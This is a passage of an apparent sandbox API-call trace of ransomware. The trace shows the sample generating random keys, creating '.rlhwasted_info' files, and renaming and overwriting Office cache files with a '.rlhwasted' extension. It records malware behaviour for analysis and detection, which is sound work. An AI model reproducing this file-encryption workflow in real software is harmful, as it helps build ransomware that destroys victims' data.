(hProv=0x6ebc88, dwFlags=0x0) returned 1 [0183.786] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6ebc88) returned 1 [0183.787] CryptGenRandom (in: hProv=0x6ebc88, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0183.787] CryptReleaseContext (hProv=0x6ebc88, dwFlags=0x0) returned 1 [0183.799] SetEndOfFile (hFile=0x128) returned 1 [0183.802] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec098 | out: hHeap=0x6b0000) returned 1 [0183.802] CloseHandle (hObject=0x128) returned 1 [0183.804] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eb570 | out: hHeap=0x6b0000) returned 1 [0183.804] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e92f0 | out: hHeap=0x6b0000) returned 1 [0183.804] _aulldvrm () returned 0x0 [0183.804] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6e92f0) returned 1 [0183.806] CryptGenRandom (in: hProv=0x6e92f0, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0183.806] CryptReleaseContext (hProv=0x6e92f0, dwFlags=0x0) returned 1 [0183.806] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 81 [0183.806] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2ac) returned 0x6eb570 [0183.806] lstrcpyW (in: lpString1=0x6eb612, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0183.806] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6eba80 [0183.806] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6e92f0) returned 1 [0183.807] CryptGenRandom (in: hProv=0x6e92f0, dwLen=0xa34, pbBuffer=0x6eba80 | out: pbBuffer=0x6eba80) returned 1 [0183.807] CryptReleaseContext (hProv=0x6e92f0, dwFlags=0x0) returned 1 [0183.807] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.rlhwasted_info" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0183.809] WriteFile (in: hFile=0x128, lpBuffer=0x6eba80*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6eba80*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0183.810] SetEndOfFile (hFile=0x128) returned 1 [0183.811] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0183.811] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eba80 | out: hHeap=0x6b0000) returned 1 [0183.811] lstrcpyW (in: lpString1=0x6eb612, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0183.811] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml.rlhwasted")) returned 1 [0183.812] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0183.812] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x114 [0183.812] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0xc72 [0183.812] MapViewOfFile (hFileMappingObject=0x114, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc72) returned 0x6a0000 [0183.812] CloseHandle (hObject=0x110) returned 1 [0183.816] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0183.817] CloseHandle (hObject=0x114) returned 1 [0183.817] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6eba80 [0183.817] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6e92f0) returned 1 [0183.818] CryptGenRandom (in: hProv=0x6e92f0, dwLen=0x1b8, pbBuffer=0x6ebac8 | out: pbBuffer=0x6ebac8) returned 1 [0183.818] CryptReleaseContext (hProv=0x6e92f0, dwFlags=0x0) returned 1 [0183.818] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6e92f0) returned 1 [0183.819] CryptGenRandom (in: hProv=0x6e92f0, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0183.819] CryptReleaseContext (hProv=0x6e92f0, dwFlags=0x0) returned 1 [0183.831] SetEndOfFile (hFile=0x128) returned 1 [0183.834] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec098 | out: hHeap=0x6b0000) returned 1 [0183.834] CloseHandle (hObject=0x128) returned 1 [0183.836] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eb570 | out: hHeap=0x6b0000) returned 1 [0183.836] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ecb60 | out: hHeap=0x6b0000) returned 1 [0183.837] _aulldvrm () returned 0x0 [0183.837] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6e92f0) returned 1 [0183.838] CryptGenRandom (in: hProv=0x6e92f0, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0183.838] CryptReleaseContext (hProv=0x6e92f0, dwFlags=0x0) returned 1 [0183.838] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0183.838] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2a2) returned 0x6eb570 [0183.838] lstrcpyW (in: lpString1=0x6eb608, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0183.838] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6eba80 [0183.838] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6e92f0) returned 1 [0183.839] CryptGenRandom (in: hProv=0x6e92f0, dwLen=0xa34, pbBuffer=0x6eba80 | out: pbBuffer=0x6eba80) returned 1 [0183.839] CryptReleaseContext (hProv=0x6e92f0, dwFlags=0x0) returned 1 [0183.839] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.rlhwasted_info" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0183.839] WriteFile (in: hFile=0x128, lpBuffer=0x6eba80*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6eba80*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0183.841] SetEndOfFile (hFile=0x128) returned 1 [0183.841] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0183.841] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eba80 | out: hHeap=0x6b0000) returned 1 [0183.841] lstrcpyW (in: lpString1=0x6eb608, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0183.841] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml.rlhwasted")) returned 1 [0183.842] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0183.842] CreateFileMappingW (hFile=0x114, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0183.842] GetFileSize (in: hFile=0x114, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x106f [0183.842] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x106f) returned 0x6a0000 [0183.842] CloseHandle (hObject=0x114) returned 1 [0183.849] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0183.849] CloseHandle (hObject=0x110) returned 1 [0183.849] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6eba80 [0183.849] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6d5aa8) returned 1 [0183.850] CryptGenRandom (in: hProv=0x6d5aa8, dwLen=0x1b8, pbBuffer=0x6ebac8 | out: pbBuffer=0x6ebac8) returned 1 [0183.850] CryptReleaseContext (hProv=0x6d5aa8, dwFlags=0x0) returned 1 [0183.850] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6d5aa8) returned 1 [0183.851] CryptGenRandom (in: hProv=0x6d5aa8, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0183.851] CryptReleaseContext (hProv=0x6d5aa8, dwFlags=0x0) returned 1 [0183.865] SetEndOfFile (hFile=0x128) returned 1 [0183.868] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eda90 | out: hHeap=0x6b0000) returned 1 [0183.868] CloseHandle (hObject=0x128) returned 1 [0183.873] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eb570 | out: hHeap=0x6b0000) returned 1 [0183.873] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ecc60 | out: hHeap=0x6b0000) returned 1 [0183.873] _aulldvrm () returned 0x0 [0183.873] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6eba80) returned 1 [0183.874] CryptGenRandom (in: hProv=0x6eba80, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0183.874] CryptReleaseContext (hProv=0x6eba80, dwFlags=0x0) returned 1 [0183.874] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0183.874] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2a2) returned 0x6eb570 [0183.874] lstrcpyW (in: lpString1=0x6eb608, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0183.874] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6eda90 [0183.874] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6eba80) returned 1 [0183.875] CryptGenRandom (in: hProv=0x6eba80, dwLen=0xa34, pbBuffer=0x6eda90 | out: pbBuffer=0x6eda90) returned 1 [0183.875] CryptReleaseContext (hProv=0x6eba80, dwFlags=0x0) returned 1 [0183.875] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.rlhwasted_info" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0183.888] WriteFile (in: hFile=0x128, lpBuffer=0x6eda90*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6eda90*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0183.889] SetEndOfFile (hFile=0x128) returned 1 [0183.889] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0183.890] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eda90 | out: hHeap=0x6b0000) returned 1 [0183.890] lstrcpyW (in: lpString1=0x6eb608, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0183.890] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml.rlhwasted")) returned 1 [0183.890] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0183.891] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x114 [0183.891] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x978 [0183.891] MapViewOfFile (hFileMappingObject=0x114, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x978) returned 0x6a0000 [0183.891] CloseHandle (hObject=0x110) returned 1 [0183.898] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0183.899] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6eba80) returned 1 [0183.900] CryptGenRandom (in: hProv=0x6eba80, dwLen=0x1b8, pbBuffer=0x6ec6c8 | out: pbBuffer=0x6ec6c8) returned 1 [0183.900] CryptReleaseContext (hProv=0x6eba80, dwFlags=0x0) returned 1 [0183.900] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6eba80) returned 1 [0183.901] CryptGenRandom (in: hProv=0x6eba80, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0183.901] CryptReleaseContext (hProv=0x6eba80, dwFlags=0x0) returned 1 [0183.912] SetEndOfFile (hFile=0x128) returned 1 [0183.914] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef298 | out: hHeap=0x6b0000) returned 1 [0183.914] CloseHandle (hObject=0x128) returned 1 [0183.916] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eb570 | out: hHeap=0x6b0000) returned 1 [0183.917] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ecd58 | out: hHeap=0x6b0000) returned 1 [0183.917] _aulldvrm () returned 0x0 [0183.917] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6eba80) returned 1 [0183.919] CryptGenRandom (in: hProv=0x6eba80, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0183.919] CryptReleaseContext (hProv=0x6eba80, dwFlags=0x0) returned 1 [0183.919] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 78 [0183.919] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2a6) returned 0x6eb570 [0183.919] lstrcpyW (in: lpString1=0x6eb60c, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0183.919] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef298 [0183.919] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6eba80) returned 1 [0183.920] CryptGenRandom (in: hProv=0x6eba80, dwLen=0xa34, pbBuffer=0x6ef298 | out: pbBuffer=0x6ef298) returned 1 [0183.920] CryptReleaseContext (hProv=0x6eba80, dwFlags=0x0) returned 1 [0183.920] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.rlhwasted_info" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0183.921] WriteFile (in: hFile=0x128, lpBuffer=0x6ef298*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef298*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0183.923] SetEndOfFile (hFile=0x128) returned 1 [0183.923] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0183.923] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef298 | out: hHeap=0x6b0000) returned 1 [0183.923] lstrcpyW (in: lpString1=0x6eb60c, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0183.923] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml.rlhwasted")) returned 1 [0183.924] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0183.924] CreateFileMappingW (hFile=0x114, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0183.924] GetFileSize (in: hFile=0x114, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x708 [0183.924] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x708) returned 0x6a0000 [0183.924] CloseHandle (hObject=0x114) returned 1 [0183.937] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6eba80) returned 1 [0183.938] CryptGenRandom (in: hProv=0x6eba80, dwLen=0x1b8, pbBuffer=0x6f1d20 | out: pbBuffer=0x6f1d20) returned 1 [0183.938] CryptReleaseContext (hProv=0x6eba80, dwFlags=0x0) returned 1 [0183.938] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6eba80) returned 1 [0183.939] CryptGenRandom (in: hProv=0x6eba80, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0183.939] CryptReleaseContext (hProv=0x6eba80, dwFlags=0x0) returned 1 [0183.950] SetEndOfFile (hFile=0x128) returned 1 [0183.953] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef298 | out: hHeap=0x6b0000) returned 1 [0183.953] CloseHandle (hObject=0x128) returned 1 [0183.956] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eb570 | out: hHeap=0x6b0000) returned 1 [0183.956] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ece50 | out: hHeap=0x6b0000) returned 1 [0183.956] _aulldvrm () returned 0x0 [0183.957] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6eba80) returned 1 [0183.958] CryptGenRandom (in: hProv=0x6eba80, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0183.958] CryptReleaseContext (hProv=0x6eba80, dwFlags=0x0) returned 1 [0183.958] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 85 [0183.958] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2b4) returned 0x6f1cd8 [0183.958] lstrcpyW (in: lpString1=0x6f1d82, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0183.958] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef298 [0183.958] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6eba80) returned 1 [0183.959] CryptGenRandom (in: hProv=0x6eba80, dwLen=0xa34, pbBuffer=0x6ef298 | out: pbBuffer=0x6ef298) returned 1 [0183.959] CryptReleaseContext (hProv=0x6eba80, dwFlags=0x0) returned 1 [0183.959] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.rlhwasted_info" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0183.959] WriteFile (in: hFile=0x128, lpBuffer=0x6ef298*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef298*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0183.961] SetEndOfFile (hFile=0x128) returned 1 [0183.964] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0183.964] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef298 | out: hHeap=0x6b0000) returned 1 [0183.964] lstrcpyW (in: lpString1=0x6f1d82, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0183.964] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml.rlhwasted")) returned 1 [0183.983] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0183.983] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x114 [0183.983] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x543 [0183.983] MapViewOfFile (hFileMappingObject=0x114, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x543) returned 0x6a0000 [0183.983] CloseHandle (hObject=0x124) returned 1 [0183.987] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6eceb8) returned 1 [0183.988] CryptGenRandom (in: hProv=0x6eceb8, dwLen=0x1b8, pbBuffer=0x6eb7c8 | out: pbBuffer=0x6eb7c8) returned 1 [0183.988] CryptReleaseContext (hProv=0x6eceb8, dwFlags=0x0) returned 1 [0183.988] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6eceb8) returned 1 [0183.989] CryptGenRandom (in: hProv=0x6eceb8, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0183.989] CryptReleaseContext (hProv=0x6eceb8, dwFlags=0x0) returned 1 [0184.000] SetEndOfFile (hFile=0x128) returned 1 [0184.003] 